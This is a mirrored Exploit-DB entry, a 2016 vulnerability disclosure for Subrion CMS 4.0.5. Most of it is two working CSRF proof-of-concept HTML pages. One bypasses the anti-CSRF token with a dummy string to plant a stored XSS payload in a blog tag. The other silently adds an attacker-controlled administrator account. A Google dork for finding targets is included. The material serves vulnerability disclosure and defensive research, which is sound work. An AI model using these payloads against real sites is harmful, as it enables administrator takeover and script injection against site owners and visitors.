bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40553.txt
Offensive Security 558ab1fc67 DB: 2016-10-18 
24 new exploits

Entrepreneur Job Portal Script - SQL Injection
Entrepreneur Job Portal Script 2.06 - SQL Injection
NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation

HP Client - Automation Command Injection / Remote Code Execution
HP Client 9.1/9.0/8.1/7.9 - Command Injection

NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation
NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation
Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation
Firefox 49.0.1 - Denial of Service
Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation
NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation
NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation
Student Information System (SIS) 0.1 - Authentication Bypass
Web Based Alumni Tracking System 0.1 - SQL Injection
Simple Dynamic Web 0.1 - SQL Injection
Learning Management System 0.1 - Authentication Bypass
Fashion Shopping Cart 0.1 - SQL Injection
Health Record System 0.1 - Authentication Bypass
Windows x64 - WinExec() Shellcode (93 bytes)
Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation
PHP Telephone Directory - Multiple Vulnerabilities
Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting
PHP Image Database - Multiple Vulnerabilities
Simple Shopping Cart Application 0.1 - SQL Injection
PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
School Full CBT 0.1 - SQL Injection
PHP Business Directory - Multiple Vulnerabilities
Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)
Ruby on Rails - Dynamic Render File Upload Remote Code Execution
Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)
2016-10-18 05:01:18 +00:00

249 lines
No EOL
11 KiB
Text
Executable file
Raw Blame History

# Exploit Title: Subrion CMS 4.0.5 - CSRF Bypass to Persistent XSS and Add-Admin
# Date: 15-10-2016
# Software Link: http://www.subrion.org/download/
# Vendor: http://www.subrion.org
# Google Dork: "Powered by Subrion CMS"
# Exploit Author: Ahsan Tahir
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsantahir.net
# Category: webapps
# Version: 4.0.5
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
[+] CSRF bypass to Persistent XSS
1. Description
There was an Anti-CSRF token while adding a post in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter
the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed
means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website,
a blog post will be created with a tag like this: "</title><script>alert(document.domain);</script>" and now the XSS can be executed
here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
2. Proof of Concept (CSRF to Persistent XSS)
Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new post named
"Hacked by Ahsan" will be created, with a tag "</title><script>alert(document.domain);</script>", means that we exploited
CSRF sucessfully!
XSS will execute here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
[!] PoC Code:
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/subi/admin/blog/add/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------292766351574");
xhr.withCredentials = true;
var body = "-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"title\"\r\n" +
"\r\n" +
"Hacked by Ahsan Tahir\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"alias\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"body\"\r\n" +
"\r\n" +
"\x3cp\x3eHacked by Ahsan Tahir\x3c/p\x3e\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"tags\"\r\n" +
"\r\n" +
"\x3c/title\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"v[image]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"owner\"\r\n" +
"\r\n" +
"Administrator (emailofadmin@gmail.com)\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"member_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"date_added\"\r\n" +
"\r\n" +
"2016-10-15 04:41\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------292766351574--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
[+] Add-Admin CSRF
1. Description
There was an Anti-CSRF token while adding an admin in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter
the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed
means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website,
a new admin will be created with an email which is controled by attacker, means now the attacker have full administration over the
Subrion CMS Blog!
2. Proof of Concept
Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new admin named
"Haxor" will be created, with email "ahsan@ahsan.py", means that we exploited the CSRF sucessfully, and now the attacker
has full control over the subrion blog!
[!] PoC Code:
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/subi/admin/members/add/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2573679013209");
xhr.withCredentials = true;
var body = "-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"username\"\r\n" +
"\r\n" +
"haxor\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"fullname\"\r\n" +
"\r\n" +
"Craxor\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"ahsan@ahsan.py\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"_password\"\r\n" +
"\r\n" +
"ahsan123\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"_password2\"\r\n" +
"\r\n" +
"ahsan123\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"website\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"phone\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"biography\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"facebook\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"twitter\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"gplus\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"linkedin\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"sponsored\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"featured\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"featured_end\"\r\n" +
"\r\n" +
"2016-11-15 04:54\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------2573679013209--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
Reference in a new issue View git blame Copy permalink